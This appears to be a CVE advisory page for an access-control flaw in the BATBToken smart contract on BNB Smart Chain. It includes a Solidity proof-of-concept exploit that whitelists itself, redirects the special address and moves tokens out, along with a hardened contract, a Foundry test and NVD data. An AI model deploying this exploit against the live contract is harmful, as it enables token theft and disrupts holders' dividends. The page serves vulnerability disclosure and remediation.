Security Vulnerability Report
CVE-2025-57247 CVSS 9.1 CRITICAL

Published: 2025-10-06 17:16:06
Last Modified: 2026-04-15 00:35:42

Description

The BATBToken smart contract (address 0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2, Compiler Version v0.8.26+commit.8a97fa7a) contains incorrect access control implementation in whitelist management functions. The setColdWhiteList() and setSpecialAddress() functions in the base ERC20 contract are declared as public without proper access control modifiers, allowing any user to bypass transfer restrictions and manipulate special address settings. This enables unauthorized users to circumvent cold time transfer restrictions and potentially disrupt dividend distribution mechanisms, leading to privilege escalation and violation of the contract's intended tokenomics.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No CPE configuration data available. The affected artifact is a single deployed contract:

BATBToken contract address 0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2 on BNB Smart Chain (per the bscscan reference), Compiler v0.8.26+commit.8a97fa7a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

// PoC for CVE-2025-57247: BATBToken Access Control Vulnerability
// Demonstrates how any user can call the whitelist management functions
// without proper access control.

interface IBATBToken {
    // Vulnerable functions in the base ERC20 contract
    function setColdWhiteList(address addr, bool status) external;
    function setSpecialAddress(address addr) external;
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address account) external view returns (uint256);
}

contract Exploit {
    IBATBToken public target;

    constructor(address _target) {
        target = IBATBToken(_target);
    }

    function exploit() external {
        // Step 1: Add this contract to the cold whitelist to bypass transfer restrictions.
        // No access control check: any caller succeeds.
        target.setColdWhiteList(address(this), true);

        // Step 2: Point the special address at this contract to disrupt dividend distribution.
        // No access control check: any caller succeeds.
        target.setSpecialAddress(address(this));

        // Step 3: With the whitelist entry in place, move any tokens this contract holds
        // out to the caller despite the cold-time transfer restriction.
        uint256 balance = target.balanceOf(address(this));
        if (balance > 0) {
            target.transfer(msg.sender, balance);
        }
    }

    receive() external payable {}
}

/*
 * Attack Steps:
 * 1. Deploy the Exploit contract with the BATBToken address as constructor argument
 * 2. Call exploit() on the Exploit contract
 * 3. The exploit contract will:
 *    a. Call setColdWhiteList() to add itself to the cold whitelist (bypassing restrictions)
 *    b. Call setSpecialAddress() to manipulate dividend distribution
 *    c. Transfer any tokens held by the exploit contract to the attacker
 *
 * Note: This vulnerability requires no authentication, no user interaction,
 * and can be exploited remotely via network (AV:N, PR:N, UI:N).
 */
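The description and the PoC above both hinge on one pattern: state-changing whitelist setters declared public with no caller check. The following is an added example, not BATBToken's source code and not part of the original report. It reconstructs that pattern in a minimal contract, places a hardened version beside it (the same two setters gated by an owner check), and includes a Foundry test showing an unprivileged caller succeeding against the first and reverting against the second. The storage names, modifier, events and custom errors are assumptions chosen for the example; the real contract's layout is only known from the function names the advisory cites.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;

// Added example, not BATBToken's source. Minimal reconstruction of the
// advisory's pattern (public whitelist setters with no access control)
// beside a hardened version, plus a Foundry test. Storage layout,
// modifier, event and error names are assumptions for illustration.

import "forge-std/Test.sol";

abstract contract ColdWhitelistBase {
    mapping(address => bool) public coldWhiteList;
    address public specialAddress;

    event ColdWhiteListUpdated(address indexed account, bool status);
    event SpecialAddressUpdated(address indexed previous, address indexed current);
}

// VULNERABLE: anyone can whitelist themselves or redirect the special address.
contract VulnerableWhitelist is ColdWhitelistBase {
    function setColdWhiteList(address addr, bool status) public {
        coldWhiteList[addr] = status;
        emit ColdWhiteListUpdated(addr, status);
    }

    function setSpecialAddress(address addr) public {
        emit SpecialAddressUpdated(specialAddress, addr);
        specialAddress = addr;
    }
}

// HARDENED: same setters, external, gated by a single-owner check, and
// rejecting the zero address for the special address.
contract HardenedWhitelist is ColdWhitelistBase {
    address public owner;

    error NotOwner(address caller);
    error ZeroAddress();

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner(msg.sender);
        _;
    }

    function setColdWhiteList(address addr, bool status) external onlyOwner {
        coldWhiteList[addr] = status;
        emit ColdWhiteListUpdated(addr, status);
    }

    function setSpecialAddress(address addr) external onlyOwner {
        if (addr == address(0)) revert ZeroAddress();
        emit SpecialAddressUpdated(specialAddress, addr);
        specialAddress = addr;
    }
}

// Foundry test: an arbitrary address drives the vulnerable contract freely
// and is rejected by the hardened one; the owner keeps its privileges.
contract WhitelistAccessControlTest is Test {
    address attacker = makeAddr("attacker");

    function test_vulnerable_allowsAnyCaller() public {
        VulnerableWhitelist v = new VulnerableWhitelist();
        vm.startPrank(attacker);
        v.setColdWhiteList(attacker, true);
        v.setSpecialAddress(attacker);
        vm.stopPrank();
        assertTrue(v.coldWhiteList(attacker));
        assertEq(v.specialAddress(), attacker);
    }

    function test_hardened_rejectsNonOwner() public {
        HardenedWhitelist h = new HardenedWhitelist(); // owner = this test contract

        vm.prank(attacker);
        vm.expectRevert(abi.encodeWithSelector(HardenedWhitelist.NotOwner.selector, attacker));
        h.setColdWhiteList(attacker, true);

        vm.prank(attacker);
        vm.expectRevert(abi.encodeWithSelector(HardenedWhitelist.NotOwner.selector, attacker));
        h.setSpecialAddress(attacker);

        // The deployer (owner) can still manage the whitelist.
        h.setColdWhiteList(attacker, true);
        assertTrue(h.coldWhiteList(attacker));
    }
}
```

Run with `forge test` in a project that has forge-std installed. The hardened version uses a single owner for brevity; a production token would normally use an audited Ownable or role-based implementation and the same check must cover every state-changing administrative function, since the advisory's point is that one forgotten modifier on a public setter is enough to void the cold-time restriction for everyone.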

References

https://bscscan.com/address/0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2#code
https://github.com/RikkaLzw/CVE/blob/main/CVE_BATB-TOKEN.md
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57247", "sourceIdentifier": "[email protected]", "published": "2025-10-06T17:16:05.697", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The BATBToken smart contract (address 0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2, Compiler Version v0.8.26+commit.8a97fa7a) contains incorrect access control implementation in whitelist management functions. The setColdWhiteList() and setSpecialAddress() functions in the base ERC20 contract are declared as public without proper access control modifiers, allowing any user to bypass transfer restrictions and manipulate special address settings. This enables unauthorized users to circumvent cold time transfer restrictions and potentially disrupt dividend distribution mechanisms, leading to privilege escalation and violation of the contract's intended tokenomics."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://bscscan.com/address/0xfbf1388408670c02f0dbbb74251d8ded1d63b7a2#code", "source": "[email protected]"}, {"url": "https://github.com/RikkaLzw/CVE/blob/main/CVE_BATB-TOKEN.md", "source": "[email protected]"}]}}